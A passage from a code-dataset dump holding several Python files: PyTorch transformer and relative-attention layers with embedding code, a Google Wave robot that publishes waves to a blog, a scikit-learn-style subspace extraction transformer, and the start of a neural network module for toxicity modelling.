layer_norm_eps=1e-5, batch_first=False, norm_first=False,\n device=None, dtype=None) -> None:\n factory_kwargs = {'device': device, 'dtype': dtype}\n super(TransformerDecoderLayerCross, self).__init__()\n self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n self.multihead_attn = MultiheadAttention(d_model, nhead, dropout=dropout, batch_first=batch_first,\n **factory_kwargs)\n # Implementation of Feedforward model\n self.linear1 = Linear(d_model, dim_feedforward)\n self.dropout = Dropout(dropout)\n self.linear2 = Linear(dim_feedforward, d_model)\n\n self.norm_first = norm_first\n self.norm1 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm2 = LayerNorm(d_model, eps=layer_norm_eps)\n self.norm3 = LayerNorm(d_model, eps=layer_norm_eps)\n self.dropout1 = Dropout(dropout)\n self.dropout2 = Dropout(dropout)\n self.dropout3 = Dropout(dropout)\n\n # Legacy string support for activation function.\n if isinstance(activation, str):\n self.activation = _get_activation_fn(activation)\n else:\n self.activation = activation\n\n def __setstate__(self, state):\n if 'activation' not in state:\n state['activation'] = F.relu\n super(TransformerDecoderLayerCross, self).__setstate__(state)\n\n def forward(self, tgt: Tensor, memory: Tensor, need_weights: bool = False, tgt_mask: Optional[Tensor] = None, memory_mask: Optional[Tensor] = None,\n tgt_key_padding_mask: Optional[Tensor] = None, memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer.\n\n Args:\n tgt: the sequence to the decoder layer (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n # see Fig. 1 of https://arxiv.org/pdf/2002.04745v1.pdf\n\n x = tgt\n c_att,w = self._mha_block(x, memory, memory_mask, memory_key_padding_mask)\n x = self.norm2(x + c_att)\n x = self.norm1(x + self._sa_block(x, tgt_mask, tgt_key_padding_mask))\n x = self.norm3(x + self._ff_block(x))\n if need_weights:\n return x,w\n else:\n return x\n\n # self-attention block\n def _sa_block(self, x: Tensor,\n attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x = self.self_attn(x, x, x,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=False)[0]\n return self.dropout1(x)\n\n # multihead attention block\n def _mha_block(self, x: Tensor, mem: Tensor, attn_mask: Optional[Tensor], key_padding_mask: Optional[Tensor]) -> Tensor:\n x,w = self.multihead_attn(x, mem, mem,\n attn_mask=attn_mask,\n key_padding_mask=key_padding_mask,\n need_weights=True)\n return self.dropout2(x),w\n\n # feed forward block\n def _ff_block(self, x: Tensor) -> Tensor:\n x = self.linear2(self.dropout(self.activation(self.linear1(x))))\n return self.dropout3(x)\n\n\nclass TransformerEncoder(Module):\n r\"\"\"TransformerEncoder is a stack of N encoder layers\n\n Args:\n encoder_layer: an instance of the TransformerEncoderLayer() class (required).\n num_layers: the number of sub-encoder-layers in the encoder (required).\n norm: the layer normalization component (optional).\n\n Examples::\n >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n >>> transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6)\n >>> src = torch.rand(10, 32, 512)\n >>> out = transformer_encoder(src)\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, encoder_layer, num_layers, norm=None):\n super(TransformerEncoder, self).__init__()\n self.layers = _get_clones(encoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, src: Tensor, mask: Optional[Tensor] = None, src_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the input through the encoder layers in turn.\n\n Args:\n src: the sequence to the encoder (required).\n mask: the mask for the src sequence (optional).\n src_key_padding_mask: the mask for the src keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = src\n\n for mod in self.layers:\n output = mod(output, src_mask=mask, src_key_padding_mask=src_key_padding_mask)\n\n if self.norm is not None:\n output = self.norm(output)\n\n return output\n\n\nclass TransformerDecoder(Module):\n r\"\"\"TransformerDecoder is a stack of N decoder layers\n\n Args:\n decoder_layer: an instance of the TransformerDecoderLayer() class (required).\n num_layers: the number of sub-decoder-layers in the decoder (required).\n norm: the layer normalization component (optional).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = transformer_decoder(tgt, memory)\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, decoder_layer, num_layers, norm=None):\n super(TransformerDecoder, self).__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, tgt: Tensor, memory: Tensor, need_weights: bool = False, tgt_mask: Optional[Tensor] = None,\n memory_mask: Optional[Tensor] = None, tgt_key_padding_mask: Optional[Tensor] = None,\n memory_key_padding_mask: Optional[Tensor] = None) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer in turn.\n\n Args:\n tgt: the sequence to the decoder (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = tgt\n weights = []\n\n for mod in self.layers:\n if need_weights:\n output,w = mod(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask,need_weights=True)\n weights.append(w)\n\n else:\n output = mod(output, memory, tgt_mask=tgt_mask,\n memory_mask=memory_mask,\n tgt_key_padding_mask=tgt_key_padding_mask,\n memory_key_padding_mask=memory_key_padding_mask)\n\n if self.norm is not None:\n output = self.norm(output)\n\n if need_weights:\n return output, weights\n else:\n return output\n\n\ndef _get_activation_fn(activation):\n if activation == \"relu\":\n return F.relu\n elif activation == \"gelu\":\n return F.gelu\n\n raise RuntimeError(\"activation should be relu/gelu, not {}\".format(activation))\n\n\n\nfrom typing import Optional, Tuple\nimport torch\nimport torch.nn.functional as F\nimport torch.utils.checkpoint\nfrom torch import nn\nimport numpy as np\n\n\ndef _make_causal_mask(input_ids_shape: torch.Size, dtype: torch.dtype, past_key_values_length: int = 0):\n \"\"\"\n Make causal mask used for bi-directional self-attention.\n \"\"\"\n bsz, tgt_len = input_ids_shape\n mask = torch.full((tgt_len, tgt_len), float(\"-inf\"))\n mask_cond = torch.arange(mask.size(-1))\n mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)\n mask = mask.to(dtype)\n\n if past_key_values_length > 0:\n mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype), mask], dim=-1)\n return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)\n\n\n\ndef _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):\n \"\"\"\n Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.\n \"\"\"\n bsz, src_len = mask.size()\n tgt_len = tgt_len if tgt_len is not None else src_len\n if mask.dim() == 2:\n expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype)\n elif mask.dim() == 3:\n expanded_mask = mask[:, None, :, :].to(dtype)\n else:\n raise\n\n inverted_mask = 1.0 - expanded_mask\n return inverted_mask.masked_fill(inverted_mask.bool(), torch.finfo(dtype).min)\n\n\ndef relative_attention_logits(query, key, relation):\n # We can't reuse the same logic as tensor2tensor because we don't share relation vectors across the batch.\n # In this version, relation vectors are shared across heads.\n # query: [batch, heads, num queries, depth].\n # key: [batch, heads, num kvs, depth].\n # relation: [batch, num queries, num kvs, depth].\n # qk_matmul is [batch, heads, num queries, num kvs]\n qk_matmul = torch.matmul(query, key.transpose(-2, -1))\n # q_t is [batch, num queries, heads, depth]\n q_t = query.permute(0, 2, 1, 3)\n # r_t is [batch, num queries, depth, num kvs]\n r_t = relation.transpose(-2, -1)\n # [batch, num queries, heads, depth]\n # * [batch, num queries, depth, num kvs]\n # = [batch, num queries, heads, num kvs]\n # For each batch and query, we have a query vector per head.\n # We take its dot product with the relation vector for each kv.\n q_tr_t_matmul = torch.matmul(q_t, r_t)\n # qtr_t_matmul_t is [batch, heads, num queries, num kvs]\n q_tr_tmatmul_t = q_tr_t_matmul.permute(0, 2, 1, 3)\n # [batch, heads, num queries, num kvs]\n score = qk_matmul + q_tr_tmatmul_t # / math.sqrt(query.shape[-1])\n return score\n\n\n# Adapted from The Annotated Transformer\ndef relative_attention_values(weight, value, relation):\n # In this version, relation vectors are shared across heads.\n # weight: [batch, heads, num queries, num kvs].\n # value: [batch, heads, num kvs, depth].\n # relation: [batch, num queries, num kvs, depth].\n # wv_matmul is [batch, heads, num queries, depth]\n wv_matmul = torch.matmul(weight, value)\n\n # w_t is [batch, num queries, heads, num kvs]\n w_t = weight.permute(0, 2, 1, 3)\n\n # [batch, num queries, heads, num kvs]\n # * [batch, num queries, num kvs, depth]\n # = [batch, num queries, heads, depth]\n w_tr_matmul = torch.matmul(w_t, relation)\n\n # w_tr_matmul_t is [batch, heads, num queries, depth]\n w_tr_matmul_t = w_tr_matmul.permute(0, 2, 1, 3)\n\n return wv_matmul + w_tr_matmul_t\n\n\nclass BartRelativeAttention(nn.Module):\n \"\"\"Multi-headed attention from 'Attention Is All You Need' paper\"\"\"\n\n def __init__(\n self,\n embed_dim: int,\n num_heads: int,\n dropout: float = 0.0,\n bias: bool = True,\n ):\n super().__init__()\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.dropout = dropout\n self.head_dim = embed_dim // num_heads\n assert (\n self.head_dim * num_heads == self.embed_dim\n ), f\"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {num_heads}).\"\n self.scaling = self.head_dim ** -0.5\n\n self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n\n def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):\n return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n relation_k: torch.Tensor,\n relation_v: torch.Tensor,\n key_value_states: Optional[torch.Tensor] = None,\n past_key_value: Optional[Tuple[torch.Tensor]] = None,\n attention_mask: Optional[torch.Tensor] = None,\n ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:\n \"\"\"Input shape: Batch x Time x Channel\"\"\"\n\n # if key_value_states are provided this layer is used as a cross-attention layer\n # for the decoder\n is_cross_attention = key_value_states is not None\n bsz, tgt_len, embed_dim = hidden_states.size()\n\n # get query proj\n query_states = self.q_proj(hidden_states) * self.scaling\n # get key, value proj\n if is_cross_attention and past_key_value is not None:\n # reuse k,v, cross_attentions\n key_states = past_key_value[0]\n value_states = past_key_value[1]\n elif is_cross_attention:\n # cross_attentions\n key_states = self._shape(self.k_proj(key_value_states), -1, bsz)\n value_states = self._shape(self.v_proj(key_value_states), -1, bsz)\n elif past_key_value is not None:\n # reuse k, v, self_attention\n key_states = self._shape(self.k_proj(hidden_states), -1, bsz)\n value_states = self._shape(self.v_proj(hidden_states), -1, bsz)\n key_states = torch.cat([past_key_value[0], key_states], dim=2)\n value_states = torch.cat([past_key_value[1], value_states], dim=2)\n else:\n # self_attention\n key_states = self._shape(self.k_proj(hidden_states), -1, bsz)\n value_states = self._shape(self.v_proj(hidden_states), -1, bsz)\n\n\n #proj_shape = (bsz * self.num_heads, -1, self.head_dim)\n query_states = self._shape(query_states, tgt_len, bsz)#.view(*proj_shape)\n # key_states = key_states.view(*proj_shape)\n # value_states = value_states.view(*proj_shape)\n src_len = key_states.size(2)\n\n attn_weights = relative_attention_logits(query_states, key_states, relation_k)\n #attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))\n\n if attention_mask is not None:\n if attention_mask.size() != (bsz, 1, tgt_len, src_len):\n raise ValueError(\n f\"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}\"\n )\n attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask\n #attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)\n attn_weights = F.softmax(attn_weights, dim=-1)\n attn_probs = F.dropout(attn_weights, p=self.dropout, training=self.training)\n attn_output = relative_attention_values(attn_probs,value_states,relation_v)\n #attn_output = torch.bmm(attn_probs, value_states)\n\n attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)\n attn_output = attn_output.transpose(1, 2)\n attn_output = attn_output.reshape(bsz, tgt_len, embed_dim)\n\n attn_output = self.out_proj(attn_output)\n\n return attn_output,attn_weights\n\n\nclass BartEncoderLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.embed_dim = config.hidden_size\n self.self_attn = BartRelativeAttention(\n embed_dim=self.embed_dim,\n num_heads=config.encoder_attention_heads,\n dropout=config.attention_dropout,\n )\n self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)\n self.dropout = config.dropout\n self.activation_fn = F.gelu\n self.activation_dropout = config.activation_dropout\n self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)\n self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)\n self.final_layer_norm = nn.LayerNorm(self.embed_dim)\n\n self.relation_k_emb = nn.Embedding(config.num_relation_kinds, self.self_attn.head_dim)\n self.relation_v_emb = nn.Embedding(config.num_relation_kinds, self.self_attn.head_dim)\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n attention_mask: torch.Tensor,\n relation,\n ):\n \"\"\"\n Args:\n hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape `(seq_len, batch, embed_dim)`\n attention_mask (:obj:`torch.FloatTensor`): attention mask of size\n `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.\n layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size\n `(encoder_attention_heads,)`.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n \"\"\"\n residual = hidden_states\n hidden_states = self.self_attn(\n hidden_states=hidden_states,\n attention_mask=attention_mask,\n relation_k=self.relation_k_emb(relation),\n relation_v=self.relation_v_emb(relation),\n )\n hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n hidden_states = residual + hidden_states\n hidden_states = self.self_attn_layer_norm(hidden_states)\n\n residual = hidden_states\n hidden_states = self.activation_fn(self.fc1(hidden_states))\n hidden_states = F.dropout(hidden_states, p=self.activation_dropout, training=self.training)\n hidden_states = self.fc2(hidden_states)\n hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n hidden_states = residual + hidden_states\n hidden_states = self.final_layer_norm(hidden_states)\n\n if hidden_states.dtype == torch.float16 and (\n torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()\n ):\n clamp_value = torch.finfo(hidden_states.dtype).max - 1000\n hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value)\n\n return hidden_states\n\n\nclass RelDecoderLayer(nn.Module):\n def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=F.gelu, num_relation_kinds=3):\n super().__init__()\n self.embed_dim = d_model\n\n self.self_attn = BartRelativeAttention(\n embed_dim=self.embed_dim,\n num_heads=nhead,\n dropout=dropout,\n )\n\n self.activation_fn = activation\n self.dropout = dropout\n self.activation_dropout = dropout\n\n self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)\n self.cross_attn = MultiheadAttention(self.embed_dim, nhead, dropout=dropout, batch_first=True)\n\n self.cross_attn_layer_norm = nn.LayerNorm(self.embed_dim)\n self.fc1 = nn.Linear(self.embed_dim, dim_feedforward)\n self.fc2 = nn.Linear(dim_feedforward, self.embed_dim)\n self.final_layer_norm = nn.LayerNorm(self.embed_dim)\n\n self.relation_k_emb = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n self.relation_v_emb = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n\n self.relation_k_emb_c = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n self.relation_v_emb_c = nn.Embedding(num_relation_kinds, self.self_attn.head_dim)\n\n def set_relation(self,relation_map):\n if not torch.is_tensor(relation_map):\n timesteps = torch.tensor([timesteps], dtype=torch.long)\n else:\n self.relation_map = relation_map.long()[None]\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n encoder_hidden_states: Optional[torch.Tensor] = None,\n encoder_attention_mask: Optional[torch.Tensor] = None,\n ):\n\n bs = hidden_states.shape[0]\n decoder_relation = torch.repeat_interleave(self.relation_map, bs, 0).to(hidden_states.device)\n\n residual = hidden_states\n\n # Self Attention\n # add present self-attn cache to positions 1,2 of present_key_value tuple\n hidden_states,attention_weight = self.self_attn(\n hidden_states=hidden_states,\n attention_mask=attention_mask,\n relation_k=self.relation_k_emb(decoder_relation),\n relation_v=self.relation_v_emb(decoder_relation),\n )\n hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n hidden_states = residual + hidden_states\n hidden_states = self.self_attn_layer_norm(hidden_states)\n\n # Cross-Attention Block\n if encoder_hidden_states is not None:\n residual = hidden_states\n # cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple\n hidden_states = self.cross_attn(hidden_states, encoder_hidden_states, encoder_hidden_states,\n attn_mask=attention_mask)[0]\n hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n hidden_states = residual + hidden_states\n hidden_states = self.cross_attn_layer_norm(hidden_states)\n\n # Fully Connected\n residual = hidden_states\n hidden_states = self.activation_fn(self.fc1(hidden_states))\n hidden_states = F.dropout(hidden_states, p=self.activation_dropout, training=self.training)\n hidden_states = self.fc2(hidden_states)\n hidden_states = F.dropout(hidden_states, p=self.dropout, training=self.training)\n hidden_states = residual + hidden_states\n hidden_states = self.final_layer_norm(hidden_states)\n\n return hidden_states,attention_weight\n\n\nclass TransformerRelDecoder(Module):\n r\"\"\"TransformerDecoder is a stack of N decoder layers\n\n Args:\n decoder_layer: an instance of the TransformerDecoderLayer() class (required).\n num_layers: the number of sub-decoder-layers in the decoder (required).\n norm: the layer normalization component (optional).\n\n Examples::\n >>> decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)\n >>> transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)\n >>> memory = torch.rand(10, 32, 512)\n >>> tgt = torch.rand(20, 32, 512)\n >>> out = transformer_decoder(tgt, memory)\n \"\"\"\n __constants__ = ['norm']\n\n def __init__(self, decoder_layer, num_layers, norm=None):\n super(TransformerRelDecoder, self).__init__()\n self.layers = _get_clones(decoder_layer, num_layers)\n self.num_layers = num_layers\n self.norm = norm\n\n def forward(self, tgt: Tensor, memory: Tensor) -> Tensor:\n r\"\"\"Pass the inputs (and mask) through the decoder layer in turn.\n\n Args:\n tgt: the sequence to the decoder (required).\n memory: the sequence from the last layer of the encoder (required).\n tgt_mask: the mask for the tgt sequence (optional).\n memory_mask: the mask for the memory sequence (optional).\n tgt_key_padding_mask: the mask for the tgt keys per batch (optional).\n memory_key_padding_mask: the mask for the memory keys per batch (optional).\n\n Shape:\n see the docs in Transformer class.\n \"\"\"\n output = tgt\n attention_weights = []\n for mod in self.layers:\n output,att_w = mod(hidden_states = output, encoder_hidden_states = memory)\n attention_weights.append(att_w)\n if self.norm is not None:\n output = self.norm(output)\n\n return output,attention_weights\n\n\nclass PositionEmbedding(nn.Module):\n def __init__(self, max_seq, max_ld_p, text_d, max_read=None):\n super(PositionEmbedding,self).__init__()\n self.index_p = nn.Embedding(max_seq,text_d)\n self.ld_p = nn.Embedding(max_ld_p,text_d)\n self.do_read = False\n if max_read:\n self.read_time = nn.Embedding(max_read, text_d)\n self.do_read = True\n\n def forward(self,x,position_idx,time_gap,read_time=None):\n output = torch.zeros_like(x).to(x.device)\n output += self.index_p(position_idx)\n output += self.ld_p(time_gap)\n if self.do_read:\n output += self.read_time(read_time)\n return output\n\n\nclass EmbeddingLayer(nn.Module):\n def __init__(self, config):\n super(EmbeddingLayer, self).__init__()\n self.config = config\n\n self.operator = nn.Embedding(config.operator_num, config.text_d)\n self.browserType = nn.Embedding(config.browserType_num, config.text_d)\n self.deviceType = nn.Embedding(config.deviceType_num, config.text_d)\n self.osType = nn.Embedding(config.osType_num, config.text_d)\n self.province = nn.Embedding(config.province_num, config.text_d)\n self.city = nn.Embedding(config.city_num, config.text_d)\n\n self.item_type = nn.Embedding(config.token_type_num, config.text_d)\n self.session_p = nn.Embedding(config.max_session,config.text_d)\n\n self.entity_num = nn.Embedding(config.max_entity_num, config.text_d)\n self.entity_num_p = nn.Embedding(config.max_entity_num_p, config.text_d)\n self.entity_num_n = nn.Embedding(config.max_entity_num_n, config.text_d)\n self.entity_num_z = nn.Embedding(config.max_entity_num_z, config.text_d)\n\n def user_ebedding(self, input):\n operator_id, browserType_id, deviceType_id, osType_id, province_id, city_id = input\n operator = self.operator(operator_id)\n browserType = self.browserType(browserType_id)\n deviceType = self.deviceType(deviceType_id)\n osType = self.osType(osType_id)\n province = self.province(province_id)\n city = self.city(city_id)\n user_embedding = operator + browserType + deviceType + osType + province + city\n return user_embedding\n\n def item_embedding(self, input):\n text_type, session_ids = input\n type_embedding = self.item_type(text_type)\n session_embedding = self.session_p(session_ids)\n #word_embedding = self.word_project(word_vector)\n item_embedding = type_embedding + session_embedding\n return item_embedding\n\n\n def entity_embedding(self,entityInput):\n e_num, p_num, n_num, z_num = entityInput\n e_embedding = self.entity_num(e_num)\n p_embedding = self.entity_num_p(p_num)\n n_embedding = self.entity_num_n(n_num)\n z_embedding = self.entity_num_z(z_num)\n return e_embedding + p_embedding + n_embedding + z_embedding\n\n def forward(self, userInput, itemInput, entityInput):\n user_embedding = self.user_ebedding(userInput)\n item_embedding = self.item_embedding(itemInput)\n entity_embedding = self.entity_embedding(entityInput)\n embeddings = item_embedding + user_embedding.unsqueeze(1) + entity_embedding\n return embeddings","repo_name":"zhengyanzhao1997/COOP","sub_path":"src/transformers_model/transformer_util.py","file_name":"transformer_util.py","file_ext":"py","file_size_in_byte":56838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71370584785","text":"__authors__ = ['douwe@google.com (Douwe Osinga)',\n 'davidbyttow@google.com (David Byttow)']\n\n\nimport logging\nimport os\nimport urllib\n\nfrom api import document\nfrom api import events\nfrom api import robot\nimport model\n\n# Globals\nROBOT_NAME = 'bloggy'\n\n# If set to true, skip the confirmation dialog\nPUBLISH_IMMEDIATELY = True\n\n\ndef IsProd():\n # If hosting from prod, use the public wave sandbox.\n return os.environ['HTTP_HOST'].endswith('.appspot.com')\n\n\ndef GetKnownDomains():\n if IsProd():\n return set(['wavesandbox.com'])\n return set(['google.com', 'gwave.com', 'gmail.com'])\n\n\ndef GetRobotId():\n if IsProd():\n return 'blog-wave'\n return 'bloggy'\n\n\ndef StripKnownDomains(p):\n address, domain = p.split('@', 1)\n if domain in GetKnownDomains():\n return address\n else:\n return p\n\n\ndef IsBloggy(participant):\n return (participant.startswith(GetRobotId())\n or participant.endswith('@corp.google.com'))\n\n\ndef PublishBlog(wavelet):\n author = StripKnownDomains(wavelet.GetCreator())\n title = 'Untitled'\n if wavelet.GetTitle():\n title = wavelet.GetTitle().splitlines()[0]\n post = model.BlogPost(title=title,\n author=author,\n waveid=wavelet.GetWaveId())\n post.put()\n url = 'http://' + os.environ['HTTP_HOST'] + '/' + urllib.quote(author)\n wavelet.SetDataDocument('/published/blog-wave@appspot.com', url)\n wavelet.AddParticipant(\"public@a.gwave.com\")\n\n\ndef InsertPublishForm(blip, title):\n form = blip.GetDocument().InsertInlineBlip(1).GetDocument()\n form.AppendText('\\nDo you want to publish this wave to a blog '\n 'and that way share it with the entire world?\\n')\n form.AppendElement(\n document.FormElement(\n document.ELEMENT_TYPE.BUTTON,\n 'publish',\n value='Publish!',\n ))\n form.AppendElement(\n document.FormElement(\n document.ELEMENT_TYPE.BUTTON,\n 'nothanks',\n value='No thanks',\n ))\n\n\ndef OnParticipantsChanged(properties, context):\n \"\"\"Invoked when any participants have been added/removed from the wavelet.\"\"\"\n added = properties['participantsAdded']\n for participant in added:\n if IsBloggy(participant):\n wavelet = context.GetRootWavelet()\n if PUBLISH_IMMEDIATELY:\n PublishBlog(wavelet)\n else:\n title = 'Untitled'\n if wavelet.GetTitle():\n title = wavelet.GetTitle().splitlines()[0]\n blip = context.GetBlipById(wavelet.GetRootBlipId())\n InsertPublishForm(blip, title)\n break;\n\n\ndef OnButtonClicked(properties, context):\n wavelet = context.GetRootWavelet()\n blip = context.GetBlipById(properties['blipId'])\n blip.Delete()\n if properties['button'] == 'publish':\n PublishBlog(wavelet)\n\n\nif __name__ == '__main__':\n bloggy = robot.Robot(ROBOT_NAME.capitalize(),\n image_url='http://blog-wave.appspot.com/inc/blogger.png',\n profile_url='http://www.blogger.com')\n bloggy.RegisterHandler(events.WAVELET_PARTICIPANTS_CHANGED,\n OnParticipantsChanged)\n bloggy.RegisterHandler(events.FORM_BUTTON_CLICKED,\n OnButtonClicked)\n bloggy.Run(debug=True)\n","repo_name":"JackDanger/google-wave-samples","sub_path":"extensions/robots/python/bloggy/bloggy.py","file_name":"bloggy.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"22685042785","text":"import numpy as np\nfrom gtda.diagrams import PairwiseDistance\nfrom joblib import Parallel, delayed\nfrom scipy.spatial.distance import squareform, pdist\nfrom sklearn.base import BaseEstimator\nfrom sklearn.base import TransformerMixin\n\n\nclass SubSpaceExtraction(BaseEstimator, TransformerMixin):\n def __init__(self,\n dist_percentage=0.05,\n k_min=10,\n k_max=100,\n metric=\"euclidean\",\n n_jobs=-1):\n self.n_jobs = n_jobs\n self.dist_percentage = dist_percentage\n self.k_min = k_min\n self.k_max = k_max\n self.metric = metric\n\n def _select_subspace(self, space, label, matrix_distances, ind_x):\n target_vector_dist = matrix_distances[ind_x]\n max_dist = np.max(target_vector_dist) * self.dist_percentage\n\n indexes = target_vector_dist < max_dist\n if np.sum(indexes) > self.k_max:\n indexes = np.argsort(target_vector_dist)[:self.k_max]\n elif np.sum(indexes) < self.k_min:\n indexes = np.argsort(target_vector_dist)[:self.k_min]\n\n return space[indexes], label[indexes]\n\n def fit_transform_resample(self, X, y):\n self.fit(X, y)\n return self.transform(X, y)\n\n def fit(self, X, y):\n return self\n\n def transform(self, X, y):\n \"\"\" The transform method takes as input an array of dimension (n_sample, n_features) and for each sample\n it creates the neighourood point clouds.\"\"\"\n def compute_all_distances(X, metric):\n if metric == \"euclidean\":\n return squareform(pdist(X, metric))\n else:\n return PairwiseDistance(metric=metric, n_jobs=self.n_jobs).fit_transform(X)\n\n distance_matrix = compute_all_distances(X, self.metric)\n\n Xy_list = Parallel(n_jobs=self.n_jobs)(delayed(self._select_subspace)(X, y, distance_matrix, i) for i in range(len(X)))\n\n max_n_points = np.max([x[0].shape[0] for x in Xy_list])\n\n X_new_dims = list(X.shape)\n X_new_dims.insert(1, max_n_points)\n\n X_new = np.empty(X_new_dims)\n y_new = np.full((X.shape[0], max_n_points), np.nan)\n\n for i, element in enumerate(Xy_list):\n X_new[i, :len(element[0])] = element[0]\n X_new[i, len(element[0]):] = element[0][-1]\n y_new[i, :len(element[1])] = element[1]\n\n return X_new, (y_new, X)\n\n","repo_name":"giotto-ai/football-tda","sub_path":"sub_space_extraction.py","file_name":"sub_space_extraction.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"71217300306","text":"# !/usr/bin/env python\n## created by Yun Hao @MooreLab 2021\n## This script contains functions used to build basic neural network structure for DTox model\n\n\n## Module\nimport torch\nfrom torch import nn\n\n \n## This function defines a root loss-oriented neural network structure for each node module \nclass DToxNetModule(nn.Module):\n\t## 0. Input arguments \n\t\t# M_in: number of input neurons \n\t\t# M_out: number of output neurons \n\t\n\t## 1. Define module parameters \n\tdef __init__(self, M_in, M_out):\n\t\tsuper(DToxNetModule, self).__init__()\n\t\tself.linear = nn.Linear(M_in, M_out)\n\t\tself.activate = nn.ReLU()\n\t\n\t## 2. Define forward function \t\n\tdef forward(self, x):\n\t\t# linear transformation\n\t\tm_linear = self.linear(x)\n\t\t# nonlinear ReLU activation\n\t\tm_active = self.activate(m_linear)\n\t\treturn m_active\n\n\n## This function defines an anxiliary loss-oriented neural network structure for each node module\nclass DToxNetAuxiliary(nn.Module):\n\t## 0. Input arguments\n\t\t# M_in: number of input neurons \n\n\t## 1. Define module parameters \n\tdef __init__(self, M_in):\n\t\tsuper(DToxNetAuxiliary, self).__init__()\n\t\tself.linear = nn.Linear(M_in, 1)\n\t\tself.sigmoid = nn.Sigmoid()\n\n\t## 2. Define forward function \n\tdef forward(self, x):\n\t\t# linear transformation\n\t\tm_linear = 